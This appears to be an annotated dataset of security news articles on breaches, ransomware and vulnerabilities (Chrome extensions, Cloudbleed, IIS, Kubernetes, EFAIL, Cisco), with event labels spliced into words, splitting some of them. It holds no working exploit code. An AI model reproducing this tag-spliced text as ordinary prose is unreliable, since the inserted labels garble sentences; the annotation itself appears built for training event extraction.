developers as a way of compromising Chrome extensions into spreading affiliate program ads that scare victims into paying for PC repairs . Proofpoint researcher Kafeine has identified six compromised Chrome extensions that have been recently modified by an attacker after p hishing Attack.Phishinga developer 's Google Account credentials . Web Developer 0.4.9 , Chrometana 1.1.3 , Infinity New Tab 3.12.3 , Copyfish 2.8.5 , Web Paint 1.2.1 , and Social Fixer 20.1.1 were compromised in late July and early August . Kafeine believes TouchVPN and Betternet VPN were also comprised in late June with the same technique . Developers of several of the extensions h ave removed Vulnerability-related.PatchVulnerabilitythe threat in recent updates to their affected apps , including Web Developer , Copyfish , Chrometana , and Social Fixer . The main intent of the attack on Chrome extension developers is to divert Chrome users to affiliate programs and switch out legitimate ads with malicious ones , ultimately to generate money for the attacker through referrals . The attackers h ave also been gathering Attack.Databreachcredentials of users of Cloudflare , an availability service for website operators , which probably could be used in future attacks . The hijacked extensions were coded mostly to substitute banner ads on adult websites , but also a range of other sites , and to steal traffic from legitimate ad networks . `` In many cases , victims w ere presented Attack.Phishingwith fake JavaScript alerts prompting them to repair their PC , then redirecting them to affiliate programs from which the threat actors could profit , '' notes Kafeine . At least one of the affiliate programs receiving the hijacked traffic promoted PCKeeper , a Windows-focused tool originally from ZeobitLLC , the maker of the MacKeeper security product that was the subject of a class action suit a few years ago over false security claims . A snippet of JavaScript in the compromised extensions also downloaded a file that was served by Cloudflare containing code with a script designed to collect Cloudflare user credentials after login . Cloudflare stopped serving the file after it was alerted to the issue by Proofpoint . The phishing emails that compromised developers ' Google Accounts p urported to come from Attack.PhishingGoogle 's Chrome Web Store team , which claimed the developer 's extension did n't comply with its policies and would be removed unless the issue w as fixed.Vulnerability-related.PatchVulnerabilityAs Bleeping Computer recently reported , Google 's security team has sent an email warning to Chrome extension developers to be on the lookout for p hishing attacks.Attack.PhishingThe attackers h ad created Attack.Phishinga convincing copy of Google 's real account login page . It 's not the first time Chrome extensions have been targeted to spread adware and promote affiliate networks . In 2014 , adware firms bought several popular Chrome extensions from legitimate developers , which up to that point had maintained trustworthy products .
Bad as Cloudbleed is , there ’ s no evidence attackers exploitedVulnerability-related.DiscoverVulnerabilityit before the patch was deployedVulnerability-related.PatchVulnerability. But since the vulnerability was triggered more than 1.2m times from 6,500 sites , Cloudflare is taking no chances : the company has tapped an outside company , Veracode , to scour its code . CEO Matthew Prince pledged the external review as he set out a detailed update after 12 days of investigation . That update includes a synopsis of how the vulnerability was created and who faced the most risk . He said Cloudflare continues to work with Google and others to eliminate all leaked data from memory : We ’ ve successfully removed more than 80,000 unique cached pages . That underestimates the total number because we ’ ve requested search engines purge and re-crawl entire sites in some instances . Cloudbleed is a serious vulnerability in Cloudflare ’ s internet infrastructure that Google Project Zero researcher Tavis Ormandy discoveredVulnerability-related.DiscoverVulnerabilityin mid-February . It turned out that a single character in Cloudflare ’ s code caused the problem . In its initial blog post on the matter , Cloudflare said the issue stemmed from its decision to use a new HTML parser called cf-html . In his update , Prince said Cloudbleed was triggered when a page with two characteristics was requested through Cloudflare ’ s network
In a disclosureVulnerability-related.DiscoverVulnerabilityon March 27 that included their own simple Python proof-of-concept , the researchers outlinedVulnerability-related.DiscoverVulnerabilitythe “ buffer overflow in the ScStoragePathFromUrl function in the WebDAV service ” when an attacker sends an overlong IF header request as part of a PROPFIND request ( if that sounds obscure you can read about WebDAV here ) . DesignatedVulnerability-related.DiscoverVulnerabilityCVE-2017-7269 , that ’ s bad news , but the fact that it has been knownVulnerability-related.DiscoverVulnerabilityabout for months – with new exploits now likely – is the main takeaway . Given that IIS 6.0 shipped with Windows Server 2003 R2 in 2005 and Microsoft stopped supporting it after the end of life deadline passed in July 2015 ( ie no more patches ) , one might assume that the install base is small . More likely , this is another version of the Windows XP situation where organisations find it hard to wean themselves off core software and end up putting themselves at risk . In 2015 , research from analysts RiskIQ found 2,675 installs of IIS 6.0 inside 24 of the top FTSE-100 UK companies alone . Incredibly , the same analysis found 417 installs of IIS 5.0 in the same companies , which at that time was a year beyond extended support death . Shodan estimates 600,000 machines still visibly running this software globally , perhaps 10 % of which have the PROPFIND extension running according to an analysis by one enterprising researcher . Nobody knows , but with Microsoft unlikely to step inVulnerability-related.PatchVulnerabilitywith a fix , it could be more than enough to cause problems . The premium fix is to stop using IIS 6.0 immediately but for anyone who finds that difficult there is one hope : guerrilla patchingVulnerability-related.PatchVulnerability. We discussed this phenomenon in our recent coverage of Google ’ s “ Operation Rosehub ” , but it can be summed up by the simple idea that if the vendor in whose software a vulnerability has arisen can ’ t or won ’ t fixVulnerability-related.PatchVulnerabilitythe issue then someone else does it for them . A company called Acros Security dubbed this the “ 0patch ” and , lo and behold , has come upVulnerability-related.PatchVulnerabilitywith a “ micro-patch ” for CVE-2017-7269 . We can ’ t vouch for this but Acros explains how developed this in some detail for anyone staring down the barrel of limited options . What the latest episode challenges is the fixed idea of software lifecycles according to big software vendors , which runs something like “ we ’ ve told them in advance that support will be removed by a given date so if they don ’ t follow our advice and upgrade then that ’ s their lookout ” . The near debacle of XP ’ s zombie afterlife was an example of this MO running aground on the rocks of business reality , beside which the latest IIS 6.0 event might look modest . But an unpatchable zero-day affectingVulnerability-related.DiscoverVulnerabilityhundreds of thousands of compromised web servers won ’ t be fun for anyone – Microsoft included
Google Nest ’ s Dropcam , Dropcam Pro , Nest Cam Outdoor and Nest Cam Indoor security cameras can be easily disabled by an attacker that ’ s in their Bluetooth range , a security researcher has foundVulnerability-related.DiscoverVulnerability. The vulnerabilities are present inVulnerability-related.DiscoverVulnerabilitythe latest firmware version running on the devices ( v5.2.1 ) . They were discoveredVulnerability-related.DiscoverVulnerabilityby researcher Jason Doyle last fall , and their existence responsibly disclosedVulnerability-related.DiscoverVulnerabilityto Google , but have still not been patchedVulnerability-related.PatchVulnerability. The first two flaws can be triggered and lead to a buffer overflow condition if the attacker sends to the camera a too-long Wi-Fi SSID parameter or a long encrypted password parameter , respectively . That ’ s easy to do as Bluetooth is never disabled after the initial setup of the cameras , and attackers ( e.g . burglars ) can usually come close enough to them to perform the attack . Triggering one of these flaws will make the devices crash and reboot . The third flaw is a bit more serious , as it allows the attacker to force the camera to temporarily disconnect from the wireless network to which it is connected by supplying it a new SSID to connect to . If that particular SSID does not exist , the camera drops its attempt to associate with it and return to the original Wi-Fi network , but the whole process can last from 60 to 90 seconds , during which the camera won ’ t be recording . Unfortunately , Bluetooth can ’ t be disabled on these cameras , so there is little users can do to minimize this particular risk . Nest has apparently already preparedVulnerability-related.PatchVulnerabilitya patch but hasn’t pushed it outVulnerability-related.PatchVulnerabilityyet . It is supposedly scheduled to be releasedVulnerability-related.PatchVulnerabilitysoon , but no definite date has been offered
A ransomware threat called SLocker , which accounted for one-fifth of Android malware attacks in 2015 , is back with avengeance , according to security firm Wandera . SLocker encrypts images , documents and videos on Android devices and demands a ransomAttack.Ransomto decrypt the files . Once the malware is executed , it runs in the background of a user 's device without their knowledge or consent . Once it has encrypted files on the phone , the malware hijacks the device , blocking the user 's access , and attempts to intimidate them into paying a ransomAttack.Ransomto unlock it . Last year , security company Bitdefender said that ransomware was the largest malware risk to Android users in the second half of 2015 - with SLocker accounting for 22 per cent of Android malware threats in the UK in that period . The malware also topped the ransomware charts in Germany and Australia , and Bitdefender claimed that 44 per cent of Android users it asked had already paid out a ransomAttack.Ransomin order to regain access to their devices . The malware continued to cause problems and , in mid-2016 , its attacksAttack.Ransomwere estimated to have resulted in tens of millions of dollars in ransoms paidAttack.Ransom. Weeks after the initial wave of attacks , security companies patchedVulnerability-related.PatchVulnerabilitythe issue for their enterprise customers , devices were updatedVulnerability-related.PatchVulnerabilityand the threat disappeared . That is until now . Mobile security firm Wandera said that its mobile intelligence engine MI : RIAM had detected more than 400 variants of the same malware . It said that these strains were targeting businesses ' mobile fleets through easily accessible third-party app stores and websites where security checks are not as rigorous as they ought to be . According to Wandera , the variants have been redesigned and repackaged to avoid all known detection techniques . `` They utilise a wide variety of disguises including altered icons , package names , resources and executable files in order to evade signature-based detection , '' the company said . Third-party app stores and unknown vendors should be avoided by Android users , while corporate administrators should be wary of SLocker returning and put in place security measures to monitor devices accordingly .
Google has announcedVulnerability-related.DiscoverVulnerabilitya crackdown on intrusive pop-up advertisements on its Chrome web browser after a previous update failedVulnerability-related.PatchVulnerabilityto stop them . The ads open users up to phishing attacksAttack.Phishingthat attempt to scamAttack.Phishingpeople into giving private information such as bank details to online fraudsters . Google says the ads create an 'abusive experience for users ' , including fee messages , unexpected clicks , phishing attemptsAttack.Phishingand misleading site behaviour . The firm tried to stopVulnerability-related.PatchVulnerabilitymanipulative adverts in an update last February but now admits that it 'did not go far enough ' . Chrome currently has an option to enable a pop-up blocker but fraudsters have quickly found ways around this . The company declined to name the companies involved in the crackdown but said that the update will blockVulnerability-related.PatchVulnerabilityads from a 'small number of sites with persistent abusive problems ' . Pop-ups are small windows that tend to show system warnings which are difficult to close , as well as 'watch video ' buttons . When the company announced its previous crackdown back in February , critics were quick to point out that the firm wanted to make ads more tolerable - so that their own could get past filters . Some said that the aim was to persuade people to disable their ad block so as not to deprive publishers ( including Google ) from displaying their advertisements and thus depriving them of revenue . Although they did not go into detail about why the previous block did n't work , Chrome product manager Vivek Sekhar said : 'We 've learned since then that this approach did not go far enough . ' 'In fact , more than half of these abusive experiences are not blocked by our current set of protections , and nearly all involve harmful or misleading ads . ' Advertisements also tend to be a hotbed for malicious software or scams where fraudsters trickAttack.Phishingpeople into giving out their personal information . Once a pop-up is clicked on , the ad can take you to a separate web page asking you to download an application and actually triggers an onslaught of more pop-up ads
A Warwick company ’ s managing director is warning other businesses to protect themselves from cyber criminals after being held to ransomAttack.Ransom. Kettell Video Productions was targeted by tech scammers who infected its IT systems with viruses before demandingAttack.Ransom£1,000 in online currency Bitcoins or the files would be permanently deleted . Luckily , owner Stuart Kettell routinely backs up all his company ’ s systems so nothing was lost but he warned others to do the same to avoid disaster . “ It was scary : I had no idea about cyber-attacks before and really didn ’ t know what to do , ” he said . “ Critical files , including images and videos for clients , were wiped out along with a lifetime of personal memories . “ The affected files were lost for good – the only way to recover them was with the key code held by the blackmailer – but luckily I back-up everything to an external data cartridge . “ In the end it was more an inconvenience…but it could have threatened the business . “ I would strongly urge all business owners to back-up their essential files. ” Mr Kettell acted quickly when he realised the audio-visual specialists in Arlescote Close were under attack by the web sharks in December , 2015 . “ I noticed all my photos , videos and pdf files ghosting to white with a new filename… it attacked my desktop first then it wormed its way into folders one file at a time every few seconds , ” he said . “ I ’ ve no idea how the malware was introduced as we use software that ’ s designed to prevent against such attacks . “ And the demand for paymentAttack.Ransomseemed very professional : I was given links where I could buy Bitcoins and even offered the chance to decrypt one file for free . “ I unplugged my computer , isolated it from the internet , and ran some anti-malware software to stop the virus spreading further. ” Latest figures from the Crime Survey for England & Wales estimated there were 1.3m computer virus offences and 667,000 hacking related offences committed in the year ending September 2016 . Sergeant Gary Sirrell from the cybercrime team at West Midlands Regional Organised Crime Unit said commercial web attacks are increasingly being committed against smaller firms and not big multi-nationals . “ Small and medium sized companies are easier targets : they often don ’ t have the resources or expertise to protect against cyberattacks , ” he said . “ And if they are targeted , the impact can be devastating . “ But there are steps business owners can take to mitigate the risk . “ A really effective tactic involves ‘ layering ’ defences to include a firewall , anti-malware software , staff training and regular re-training ) around phishing email awareness , and finally to plugVulnerability-related.PatchVulnerabilityany holes in your defences by updatingVulnerability-related.PatchVulnerabilitysoftware patches and updatesVulnerability-related.PatchVulnerabilityin a timely manner . “ By exercising good cyber hygiene , and having a strong backup policy , Stuart avoided the dilemma of whether to see his business significantly damaged , or to have to hand over a ransomAttack.Ransomto organised crime gangs to get his data unlocked . “ If more businesses in the West Midlands proactively took such steps there would be significantly fewer crimes victims . ”
Last week , Intel revealedVulnerability-related.DiscoverVulnerabilitythat a serious security flaw in some of its chips left potentially thousands of devices vulnerable to attackers . Then , security researchers revealedVulnerability-related.DiscoverVulnerabilitythe problem was way worse than anyone initially thought as the vulnerability could allow attackers to remotely `` hijack '' affected machines . It 's still not clear just how many devices are impactedVulnerability-related.DiscoverVulnerabilityas Intel has't said , but some in the industry have put the number as high as 8,000 . Here 's a look at what you need to know and how to protect yourself . The vulnerability stems from something called Intel Active Management Technology , ( AMT ) , a technology that allows devices to be remotely managed to make it easier to update software and perform maintenance remotely . It 's a feature typically used by businesses that may be responsible for many devices that may not all be in the same place . Since the technology is integrated at a chip level , AMT can do a bit more than other software-enabled management tools . Using AMT 's capabilities , for instance , a system administrator could remotely access and control a computer 's mouse and keyboard , or turn on a computer that 's already been powered down . While those can be helpful capabilities for corporate IT departments to have , it 's obviously the type of access you 'd want locked down pretty tightly . And that 's just the problem . Security researchers found that AMT 's web portal can be accessed with just the user admin and literally any password or even no password at all . That 's why some have labeled it a `` hijacking '' flaw since anyone who exploits the vulnerability would be able to remotely control so many processes . Most importantly , the flaw does n't impactVulnerability-related.DiscoverVulnerabilityevery Intel chip out there . Since it 's rooted inVulnerability-related.DiscoverVulnerabilityAMT , the vulnerability primarily affectsVulnerability-related.DiscoverVulnerabilitybusinesses , though , as Intel points out , some consumers use computers made for businesses . One of the easiest ways to check if you might be affected is to check that Intel sticker that comes on so many PCs . Look for a `` VPro '' logo as that indicates the presence of AMT . Of course , looking for a sticker is hardly foolproof . Intel has also released a downloadable detections guide , which will guide you through the process of checking your machines . You can find the detection guide here . Though Intel has long supplied Apple with chips for Macs , AMT is only present on processors in Windows-based machines , so all Macs are safe from this particular exploit . If you do have a machine that 's impacted by the security flaw , you 'll need to update your firmware as soon as possible . Intel has already createdVulnerability-related.PatchVulnerabilitya patch and is now waiting on manufacturers to make it availableVulnerability-related.PatchVulnerability. Some , including Dell , Lenovo , HP , and Fujitsu , have already rolled it out . You can find links to those over on Intel 's website , which will be updatedVulnerability-related.PatchVulnerabilityas more manufacturers releaseVulnerability-related.PatchVulnerabilityupdates .
The Bitcoin Core team yesterday releasedVulnerability-related.PatchVulnerabilitya patch for a DDoS vulnerability that could prove fatal to the Bitcoin network . The patch note urged miners to shut down their older versions urgently and replaceVulnerability-related.PatchVulnerabilitythem with the new version , Bitcoin Core 0.16.3 . The announcement , first reported on Hacked , revealedVulnerability-related.DiscoverVulnerabilitythat all the recent Bitcoin Core versions could be vulnerableVulnerability-related.DiscoverVulnerabilityto Distributed Denial-of-Service attack . An attack of such kind typically involves multiple compromised systems to flood a single system ( or network ) – similar to zombies encircling an uninfected person and disabling his movements . DDoS perpetrators could attack a Bitcoin network by either flooding the block with duplicate transactions , thus jamming the transaction confirmation of other people , or by flooding the nodes on Bitcoin ’ s peer-to-peer network , thus over-utilizing the bandwidth through malicious transaction relays . The recent DDoS vulnerability , termed asVulnerability-related.DiscoverVulnerabilityCVE-2018-17144 , tried to attempt the latter – flooding full node operators with traffic . Hacked reports : “ The way the potential exploit could work was by allowing anyone who was capable of mining a sufficient number of proof of work blocks to crash Bitcoin Cores running software versions 0.14.0 to 0.16.2. ” It also means that the miners who occasionally run Bitcoin Core were not vulnerableVulnerability-related.DiscoverVulnerabilityto the attack . Still , developers recommendedVulnerability-related.PatchVulnerabilityall the miners to go ahead with the latest update to stay safe . Also , the patch fixedVulnerability-related.PatchVulnerabilitysome other minor bugs related to consensus , RPC , invalid flag errors , and documentation . It is worth noticing that Bitcoin is not the only cryptocurrency that is on the DDoS attackers ’ hitlist . Flaws have been foundVulnerability-related.DiscoverVulnerabilityin other cryptocurrency clients as well , including Bitcoin Cash and Ethereum . An effective attack on the Ethereum network lasted more than a month and created million of dead accounts . In response , developers had to go through two on-chain forks and one off-chain process to clean up the mess . In another DDoS attack that slowed down the Ethereum network , miners had to increase gas fees to repel the attackers . There was no consensus failure . DDoS continues to be a global problem that impacts all spheres of the internet . Europol in its latest investigative report noted : “ Criminals continue to use Distributed-Denial-of-Service ( DDoS ) attacks as a tool against private business and the public sector . Such attacks are used not only for financial gains but the ideological , political or purely malicious reason . This type of attack is not only one of the most frequent ( second only to malware in 2017 ) ; it is also becoming more accessible , low-cost and low-risk. ” Meanwhile , decentralized networks like Bitcoin are still more secure against such attacks purely because single entities would not be able to bring them down . Also , because the people , including the attackers themselves , are heavily invested in Bitcoin , a coordinated attack would just rip them off their bitcoin validation commissions .
Microsoft has seenVulnerability-related.DiscoverVulnerabilityits share of issues as of late , and now a seemingly simple patch is causing serious issues to certain laptops running the 2016 Anniversary Update . The update was originally releasedVulnerability-related.PatchVulnerabilityto prevent a zero-day attack on IE . Per Microsoft , this was the issue being fixedVulnerability-related.PatchVulnerability: A remote code execution vulnerability exists inVulnerability-related.DiscoverVulnerabilitythe way that the scripting engine handles objects in memory in Internet Explorer . The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user . An attacker who successfully exploitedVulnerability-related.DiscoverVulnerabilitythe vulnerability could gain the same user rights as the current user . If the current user is logged on with administrative user rights , an attacker who successfully exploitedVulnerability-related.DiscoverVulnerabilitythe vulnerability could take control of an affected system . An attacker could then install programs ; view , change , or delete data ; or create new accounts with full user rights . In a web-based attack scenario , an attacker could host a specially crafted website that is designedAttack.Phishingto exploit the vulnerability through Internet Explorer and then convinceAttack.Phishinga user to view the website , for example , by sendingAttack.Phishingan email . The security update addressesVulnerability-related.PatchVulnerabilitythe vulnerability by modifying how the scripting engine handles objects in memory . But now that fix is causing a pretty big problem of its own : it ’ s preventing certain laptops from booting . The affected machines are part of a pretty small bunch—only Lenovo laptops with less than 8 GB of RAM running the 2016 Anniversary Update ( 1607 ) —but it ’ s still a pretty bad problem to have . Fortunately , there ’ s a way to bypass the failed boot by restarting into the UEFI and disabling Secure Boot . It ’ s also noted that if BitLocker is enabled that you may have to go through BitLocker recovery after disabling Secure Boot . On the upside , Microsoft is working with Lenovo to correctVulnerability-related.PatchVulnerabilitythe issue and will releaseVulnerability-related.PatchVulnerabilitya fix sometime in the future . I just wouldn ’ t count on it before the end of the year . Until then , be careful when updating devices , especially if they happen to be Lenovo laptops with limited RAM .
A design flaw affectingVulnerability-related.DiscoverVulnerabilityall in-display fingerprint sensors – that left over a half-dozen cellphone models vulnerable to a trivial lock-screen bypass attack – has been quietly patchedVulnerability-related.PatchVulnerability. The flaw was tied to a bug in the popular in-display fingerprint reader technology used for user authentication . In-display fingerprint reader technology is widely considered an up-and-coming feature to be used in a number of flagship model phones introduced in 2019 by top OEM phone makers , according to Tencent ’ s Xuanwu Lab which is credited for first identifyingVulnerability-related.DiscoverVulnerabilitythe flaw earlier this year . “ During our research on this , we found all the in-display fingerprint sensor module suffer the same problem no matter where it was manufactured by whatever vendors , ” said Yang Yu , a researcher at Xuanwu Lab . “ This vulnerability is a design fault of in-display fingerprint sensors. ” Impacted are all phones tested in the first half of 2018 that had in-display fingerprint sensors , said Yu . That includes current models of Huawei Technologies ’ Porsche Design Mate RS and Mate 20 Pro model phones . Yu said that many more cellphone manufacturers are impactedVulnerability-related.DiscoverVulnerabilityby the issue . However , Yu would not specify other impacted vendors or models : “ Vendors differ greatly in the attitude to security issues , someone have open attitudes , like Huawei , and in contrast , some vendors strongly hope us to keep the voice down on this , ” he told Threatpost . He noted Huawei has been forthcoming , issuingVulnerability-related.PatchVulnerabilitypatches to addressVulnerability-related.PatchVulnerabilitythe issue . Other phones that use the feature include Vivo Communication Technology ’ s V11 Pro , X21 and Nex ; and OnePlus ’ 6T and Xiaomi Mi 8 Explorer Edition phones . Vivo , OnePlus and Xiaomi did not respond to requests for comment from Threatpost . In-display fingerprint readers based on optical fingerprint imaging , experts believe , will soon replace conventional authentication based on capacitance-sensor fingerprint scanners . In-display readers allow for a user to place a finger on the screen of a smartphone where a scanner from behind the display can verify a fingerprint , authenticate the user and unlock the phone . Design-wise the feature allows phones to be sleeker and less cluttered , supporting infinity displays . Usability advantages include the ability to unlock the phone simply by placing your finger on the phone ’ s screen at any angle , whether it ’ s sitting on a table or in a car mount . The vulnerability , which Huawei issuedVulnerability-related.PatchVulnerabilitya patch ( CVE-2018-7929 ) for in September , can be exploitedVulnerability-related.DiscoverVulnerabilityin a matter of seconds , researchers said . In an exclusive interview with Threatpost on the flaw Yu said all an attacker needs to carry out the attack is an opaque reflective material such as aluminum foil . By placing the reflective material over a residual fingerprint on the phone ’ s display the capacitance fingerprint imaging mechanism can be tricked into authenticating a fingerprint .
Approximately 560,000 people were affected byVulnerability-related.DiscoverVulnerabilitya flaw in the script used to migrate followers to the new archival handles . `` If you were following @ POTUS before 12pET , by end of day you 'd be following * two * accounts : @ POTUS44 ( 44th Admin ) and @ POTUS ( 45th Admin ) , '' Dorsey tweeted . Dorsey apologized forVulnerability-related.DiscoverVulnerabilitythe mistake , and said Twitter has worked to correctVulnerability-related.PatchVulnerabilitythe issue . He did add , however , that the Obama Administration felt it was fair to automatically migrate followers after the transition , since @ POTUS is an institutional account . One of the most visible transfers of executive power happened today on Twitter . The official @ POTUS account was handed off to President Trump , and former-President Obama re-assumed his personal handle , @ BarackObama . ( Trump predictably continued to tweet from his personal account long into the inauguration , however . ) Michelle and I are off on a quick vacation , then we 'll get back to work . But some Twitter users are complaining that despite never following @ POTUS in the first place , the presidential handle is suddenly showing up in their timelines . Somehow , they claim , Twitter had automatically followed it for them . Folks : Check if you 're following GraemeJanuary 21 , 2017 `` I specifically UNFOLLOWED this account earlier today . Yet now I am following it again without having resubscribed , '' one user tweeted . `` @ POTUS turned up in my feed despite me not following , willingly or otherwise , '' said another person . A spokesperson for Twitter told Motherboard they could n't comment on these specific claims , but said that post-inauguration , Twitter automatically migrated the followers of @ POTUS over to the newly created @ POTUS44 account , which acts as an archive for President Obama 's tweets . The same was done for @ FLOTUS44 , belonging to Michelle Obama , and @ VP44 , belonging to former-Vice President Biden . As you can see , both versions have somewhat similar follower counts .
A critical vulnerability in Kubernetes open-source system for handling containerized applications can enable an attacker to gain full administrator privileges on Kubernetes compute nodes . Kubernetes makes it easier to manage a container environment by organizing application containers into pods , nodes ( physical or virtual machines ) and clusters . Multiple nodes form a cluster , managed by a master that coordinates cluster-related activities like scaling , scheduling , or updating apps . Each node has an agent called Kubelet that facilitates communication with the Kubernetes master via the API . The number of nodes available in a Kubernetes system can be hundreds and even thousands . Pulling this off is easy on default configurations , where `` all users ( authenticated and unauthenticated ) are allowed to perform discovery API calls that allow this escalation , '' says Jordan Liggitt , staff software engineer at Google . The security bug was discoveredVulnerability-related.DiscoverVulnerabilityby Darren Shepherd , co-founder of Rancher Labs company that provides the Kubernetes-as-a-Service solution called Rancher . Now tracked asVulnerability-related.DiscoverVulnerabilityCVE-2018-1002105 , the flaw is critical , with a Common Vulnerability Scoring System ( CVSS ) score of 9.8 out of 10 . According to the latest version of the vulnerability severity calculator , exploiting the security glitch has low difficulty and does not require user interaction . Red Hat 's OpenShift Container Platform uses Kubernetes for orchestrating and managing containers is also impactedVulnerability-related.DiscoverVulnerabilityby the vulnerability . In an advisory on the matter , the company explains that the flaw can be used in two ways against its products . One involves a normal user with 'exec , ' 'attach , ' or 'portforward ' rights over a Kubernetes pod ( a group of one or more containers that share storage and network resources ) ; they can escalate their privileges to cluster-admin level and execute any process in a container . The second attack method exploits the API extension feature used by ‘ metrics-server ’ and ‘ servicecatalog ’ in OpenShift Container Platform , OpenShift Online , and Dedicated . No privileges are required and an unauthenticated user can get admin rights to any API extension deployed to the cluster . `` Cluster-admin access to ‘ servicecatalog ’ allows creation of service brokers in any namespace and on any node , '' the advisory details . The problem has been addressedVulnerability-related.PatchVulnerabilityin the latest Kubernetes revisions : v1.10.11 , v1.11.5 , v1.12.3 , and v1.13.0-rc.1 . Kubernetes releases prior to these along with the products and services based on them are affectedVulnerability-related.DiscoverVulnerabilityby CVE-2018-1002105 . Red Hat releasedVulnerability-related.PatchVulnerabilitypatches for the OpenShift family of containerization software ( OpenShift Container Platform , OpenShift Online , and OpenShift Dedicated ) and users receivedVulnerability-related.PatchVulnerabilityservice updates they can install at their earliest convenience . The software company warns that a malicious actor could exploit the vulnerability to stealAttack.Databreachdata or inject malicious code , as well as `` bring down production applications and services from within an organization ’ s firewall . ''
Enigmail and GPG Tools have been patchedVulnerability-related.PatchVulnerabilityfor EFAIL . For more up-to-date information , please see EFF 's Surveillance Self-Defense guides . Don ’ t panic ! But you should stop using PGP for encrypted email and switch to a different secure communications method for now . A group of researchers released a paper today that describesVulnerability-related.DiscoverVulnerabilitya new class of serious vulnerabilities in PGP ( including GPG ) , the most popular email encryption standard . The new paper includes a proof-of-concept exploit that can allow an attacker to use the victim ’ s own email client to decrypt previously acquired messages and return the decrypted content to the attacker without alerting the victim . The proof of concept is only one implementation of this new type of attack , and variants may follow in the coming days . Because of the straightforward nature of the proof of concept , the severity of these security vulnerabilities , the range of email clients and plugins affected , and the high level of protection that PGP users need and expect , EFF is advising PGP users to pause in their use of the tool and seek other modes of secure end-to-end communication for now . Because we are awaiting the response from the security community of the flaws highlighted in the paper , we recommend that for now you uninstall or disable your PGP email plug-in . These steps are intended as a temporary , conservative stopgap until the immediate risk of the exploit has passed and been mitigated against by the wider community . There may be simpler mitigations availableVulnerability-related.PatchVulnerabilitysoon , as vendors and commentators develop narrower solutions , but this is the safest stance to take for now . Because sending PGP-encrypted emails to an unpatched client will create adverse ecosystem incentives to open incoming emails , any of which could be maliciously crafted to expose ciphertext to attackers . While you may not be directly affected , the other participants in your encrypted conversations are likely to be . For this attack , it isn ’ t important whether the sender or the receiver of the original secret message is targeted . This is because a PGP message is encrypted to both of their keys . At EFF , we have relied on PGP extensively both internally and to secure much of our external-facing email communications . Because of the severity of the vulnerabilities disclosed today , we are temporarily dialing down our use of PGP for both internal and external email . Our recommendations may change as new information becomes available , and we will update this post when that happens .
Researchers found they were able to infect robots with ransomware ; in the real world , such attacks could be highly damaging to businesses if robotic security is n't addressed . Ransomware has long been a headache for PC and smartphone users , but in the future , it could be robots that stop working unless a ransom is paidAttack.Ransom. Researchers at security company IOActive have shown how they managed to hack the humanoid NAO robot made by Softbank and infect one with custom-built ransomware . The researchers said the same attack would work on the Pepper robot too . After the infection , the robot is shown insulting its audience and demandingAttack.Ransomto be 'fed ' bitcoin cryptocurrency in order to restore systems back to normal . While a tiny robot making threats might initially seem amusing -- if a little creepy -- the proof-of-concept attack demonstrates the risks associated with a lack of security in robots and how organisations that employ robots could suddenly see parts of their business grind to a halt should they become a victim of ransomware . `` In order to get a business owner to pay a ransomAttack.Ransomto a hacker , you could make robots stop working . And , because the robots are directly tied to production and services , when they stop working they 'll cause a financial problem for the owner , losing money every second they 're not working , '' Cesar Cerrudo , CTO at IOActive Labs , told ZDNet . Taking what was learned in previous studies into the security vulnerabilities of robots , researchers were able to inject and run code in Pepper and NAO robots and take complete control of the systems , giving them the option to shut the robot down or modify its actions . The researchers said it was possible for an attacker with access to the Wi-Fi network the robot is running on to inject malicious code into the machine . `` The attack can come from a computer or other device that is connected to internet , so a computer gets hacked , and from there , the robot can be hacked since it 's in the same network as the hacked computer , '' said Cerrudo , who conducted the research alongside Lucas Apa , Senior Security Consultant at IOActive . Unlike computers , robots do n't yet store vast amounts of valuable information that the user might be willing to pay a ransomAttack.Ransomto retrieve . But , as companies often do n't have backups to restore systems from , if a robot becomes infected with ransomware , it 's almost impossible for the user to restore it to normal by themselves . If the alternative for a victim of robot ransomware is waiting for a technician to come to fix the robot -- or even losing access it to weeks if it needs to be returned to the manufacturer -- a business owner might view giving into the ransom demandAttack.Ransomas a lesser evil . `` If it 's one robot then it could take less time , but if there are dozens or more , every second they are n't working , the business is losing money . Keeping this in mind , shipping lots of robots takes a lot of time , so the financial impact is bigger when you have a computer compromised with ransomware , '' said Cerrudo . While the robot ransomware infections have been done for the purposes of research -- and presented at the 2018 Kaspersky Security Analyst Summit in Cancun , Mexico -- IOActive warn that if security in robotics is n't properly addressed now , there could be big risks in the near future . `` While we do n't see robots every day , they 're going mainstream soon , businesses worldwide are deploying robots for different services . If we do n't start making robots secure now , if more get out there which are easily hacked , there are very serious consequences , '' said Cerrudo . As with security vulnerabilities the Internet of Things and other products , the solution to this issue is for robotics manufacturers to think about cybersecurity at every step of the manufacturing process from day one . IOActive informed Softbank about the research in January but Cerrudo said : `` We do n't know if they [ Softbank ] are going to fixVulnerability-related.PatchVulnerabilitythe issues and when , or even if they can fixVulnerability-related.PatchVulnerabilitythe issues with the current design . '' Responding to the IOActive research , a Softbank spokesperson told ZDNet : `` We will continue to improve our security measures on Pepper , so we can counter any risks we may face . ''
While combing through WikiLeaks’ Vault 7 data dumpAttack.Databreach, Cisco has unearthedVulnerability-related.DiscoverVulnerabilitya critical vulnerability affecting 300+ of its switches and one gateway that could be exploitedVulnerability-related.DiscoverVulnerabilityto take over the devices . The flaw is presentVulnerability-related.DiscoverVulnerabilityin the Cisco Cluster Management Protocol ( CMP ) processing code in Cisco IOS and Cisco IOS XE Software . “ The vulnerability is due to the combination of two factors : the failure to restrict the use of CMP-specific Telnet options only to internal , local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device , and the incorrect processing of malformed CMP-specific Telnet options , ” Cisco explained . An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device ” . The extensive and complete list of affected devices is provided in the security advisory . Cisco says that they are not aware of any public announcements or active malicious use of the vulnerability , and that they will provideVulnerability-related.PatchVulnerabilityfree software updates to addressVulnerability-related.PatchVulnerabilityit ( they don ’ t say when ) . In the meantime , users can mitigate the risk by disabling the Telnet protocol and switching to using SSH . If that ’ s not possible , they can reduce the attack surface by implementing infrastructure access control lists . It also includes indicators of compromise that can be used to detect exploitation attempts
